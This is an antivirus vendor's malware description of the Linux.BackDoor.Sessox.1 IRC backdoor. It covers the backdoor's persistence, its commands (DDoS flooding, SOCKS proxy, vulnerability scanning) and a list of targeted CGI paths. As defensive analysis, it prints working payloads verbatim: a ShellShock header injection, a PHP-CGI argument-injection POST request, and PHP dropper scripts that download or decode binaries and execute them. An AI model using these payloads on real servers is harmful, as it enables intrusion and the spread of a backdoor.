Defend what you create

Other Resources

Close

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.BackDoor.Sessox.1

Added to the Dr.Web virus database: 2015-04-08

Virus description added:

A backdoor for Linux that receives commands from cybercriminals using a chat server supporting the IRC (Internet Relay Chat) protocol. Once the Trojan is launched on the infected computer, it registers itself in the autorun using the “/etc/init.d/rc.local” file or, if there is no file with such name, the “/etc/rc.conf” file. Then it reads the contents of its executable file “/tmp/Help1”, encrypts it with the base64 algorithm, and saves to the file “/tmp/Help1.z”. After that it performs the same actions for the “/tmp/Help2” and “/tmp/Help2.z” files. As a result, the Trojan establishes a connection with the command and control server sending it the following request:

PASS %pass%\nNICK %nick%\nUSER %user% localhost localhost :%uptime%\n

where %pass% - "44", %nick%, %user%, %uptime% stand for the strings created using the following method:

char *GetUptime()
{
  char *szUptime;
  signed int i;
  struct sysinfo info;
 
  szUptime = (char *)malloc(0x15u);
  i = 0;
  memset(szUptime, 0, 0x15u);
  do
    szUptime[i++] = rand() % 26 + 'A';
  while ( i < 20 );
  *szUptime = 'm';
  szUptime[1] = 'u';
  szUptime[2] = 'm';
  szUptime[3] = 'u';
  szUptime[4] = '-';
  sysinfo(&info);
  if ( info.uptime > 0xD2F00 )
  {
    szUptime[5] = '[';
    szUptime[6] = '1';
    szUptime[7] = '0';
    szUptime[8] = ']';
    szUptime[9] = '-';
    if ( info.uptime > 0x1A5E00 )
    {
      szUptime[6] = '2';
      if ( info.uptime > 0x278D00 )
      {
        szUptime[6] = '3';
        if ( info.uptime > 0x34BC00 )
        {
          szUptime[6] = '4';
          if ( info.uptime > 0x41EB00 )
          {
            szUptime[6] = '5';
            if ( info.uptime > 0x4F1A00 )
            {
              szUptime[6] = '6';
              if ( info.uptime > 0x5C4900 )
              {
                szUptime[6] = '7';
                if ( info.uptime > 0x697800 )
                {
                  szUptime[6] = '8';
                  if ( info.uptime > 0x76A700 )
                  {
                    szUptime[6] = '9';
                    if ( info.uptime > 0x83D600 )
                    {
                      szUptime[6] = '1';
                      szUptime[8] = '0';
                      szUptime[9] = ']';
                      szUptime[10] = '-';
                      if ( info.uptime > 0xC5C100 )
                      {
                        szUptime[7] = '5';
                        if ( info.uptime > 0x107AC00 )
                        {
                          szUptime[6] = '2';
                          szUptime[7] = '0';
                          if ( info.uptime > 0x18B8200 )
                          {
                            szUptime[6] = '3';
                            if ( info.uptime > 0x20F5800 )
                            {
                              szUptime[6] = '4';
                              if ( info.uptime > 0x2932E00 )
                                szUptime[6] = '5';
                            }
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
  return szUptime;
}

The Trojan can execute the following commands:

CommandMeaning
376Specify the mode and log in the IRC channel
433Forward the information about the computer’s working time (uptime) to the IRC channel
422Specify the mode and log in the IRC channel
PINGSend the PONG reply
NICKChange the nickname to the one specified in the command
PRIVMSGExecute one of the special functions (see below)

Special functions:

CommandMeaning
PHPSCANStart a PHP scripts’ scan (PHP Scanner)
SOCKS5Start the proxy server (SOCKS5 Proxy)
SSSCANStart scanning for the ShellShock vulnerability (ShellShock Scanner)
WEBDOSLaunch an attack on the specified website using repeating GET requests (HTTP Flooder)

By sending repeating GET requests to the website specified by criminals, the Trojan can launch an attack. Moreover, upon the criminals’ command, Linux.BackDoor.Sessox.1 can scan the attacked server for the ShellShock vulnerability. It allows to execute arbitrary code on the server. The Trojan has a list with files that can be used in the GET request:

/cgi-sys/entropysearch.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-mod/index.cgi
/cgi-bin/test.cgi
/cgi-bin-sdb/printenv
/admin.cgi
/cgi-bin/bash
/cgi-bin/hello
/cgi-bin/helpme
/cgi-bin/info.sh
/cgi-bin/php5-cli?
/cgi-bin/php5?
/cgi-bin/test-cgi
/cgi-bin/test.sh
/cgi-sys/guestbook.cgi
/cgi-sys/php5?
/phppath/cgi_wrapper?
/phppath/php?
/tmUnblock.cgi
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin/signon.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/tools/tools.pl
/phppath/cgi_wrapper
/phppath/php
/cgi-sys/FormMail-clone.cgi
/xul/
/gitweb/
/gitweb.cgi
/cgi-bin/
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php4
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/firmwarecfg
/cgi-bin/%2f/admin.html
/cgi-bin/admin.html
/sys-cgi
/cgi-bin/tree.php
/cgi-bin/w3mman2html.cgi
/cgi-bin/status/status.cgi

As a workload, the following script is used for the requests’ execution:

$a = \"%s\";
$b = \"%s\";
$c = sys_get_temp_dir();
$d = \"%s\";
$e = \"%s\";
$f = \"chmod 777\";
$g = \"file_put_contents\";
$h = \"system\";
$i = \"file_exists\";
$j = \"fopen\";
if ($i($c . \"/$d\"))
{
     exit(1);
}else{
     echo($c);
     $g(\"$c/$d\", $j(\"$a\", \"r\"));
     $g(\"$c/$e\", $j(\"$b\", \"r\"));
     $h(\"$f \" . $c .\"/$d\");
     $h(\"$f \" . $c .\"/$e\");
     $h($c . \"/$d\");
     $h($c . \"/$e\");
}

The links to the downloadable Trojan’s files are assigned to the a and b variables and the names, under which these files must be saved, are assigned to the d and e variables in the script.

On the basis of these data, the following GET request is generated:

GET %file% HTTP/1.0\r\nCookie: () { :;} ;echo;/usr/bin/php -r %script%\r\nReferer: () { :;} ;echo;/usr/local/bin/php -r %script%\r\n\r\n

where %file% stands for one file from the list given below and %script% stands for the script specified above. For the host that receives GET requests, a random IP address is generated.

Using specifically created POST requests, the malware can execute a scan of PHP scripts to launch a third-party script on the compromised server. For the recipient host, a randomly generated IP address is chosen. To create the POST request, the following script is used:

<?php
$bufferf = '%s';
$bufferf2 = '%s';
$a = sys_get_temp_dir();
$b = \"%s\";
$c = \"%s\";
$d = \"chmod 777\";
$e = \"system\";
$f = \"file_put_contents\";
$g = \"base64_decode\";
$h = \"chmod\";\n$i = \"file_exists\";
if ($i($a . \"/$c\"))
{
  exit(1);
}else{
  echo($a);
  $bufferf = $g($bufferf);
  $bufferf2 = $g($bufferf2);
  $f(\"$a/$b\", $bufferf);
  $f(\"$a/$c\", $bufferf2);
  $h ($a.\"/\".$b,0777);
  $e(\"$d \" . $a .\"/$b\");
  $h ($a.\"/\".$c,0777);
  $e(\"$d \" . $a .\"/$c\");
  $e($a . \"/$c\");
  $e($a . \"/$b\");
  exit(1);
}
?>

where the data from the files /tmp/Help1.z and /tmp/Help2.z is assigned to the bufferf and bufferf2 variables correspondingly (the backdoor’s body in base64). The “Help1” and “Help2” data is assigned to the b and с variables.

The request can be sent to the following files:

/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php5-cgi
/cgi-bin/php-cgi.bin

Then the script is inserted into the POST request:

POST %file%?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%6E HTTP/1.1\r\nHost: %ip%\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %len%\r\nConnection: close\r\n\r\n%script%

where %file% stands for the file from the above list, %ip% stands for the random IP address, %len% stands for the size of the script, %script% stands for the script described above.

News about the Trojan

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

The Russian developer of Dr.Web anti-viruses

Doctor Web has been developing anti-virus software since 1992

Dr.Web is trusted by users around the world in 200+ countries

The company has delivered an anti-virus as a service since 2007

24/7 tech support

© Doctor Web
2003 — 2019

Doctor Web is the Russian developer of Dr.Web anti-virus software. Dr.Web anti-virus software has been developed since 1992.

2-12А, 3rd street Yamskogo polya, Moscow, Russia, 125040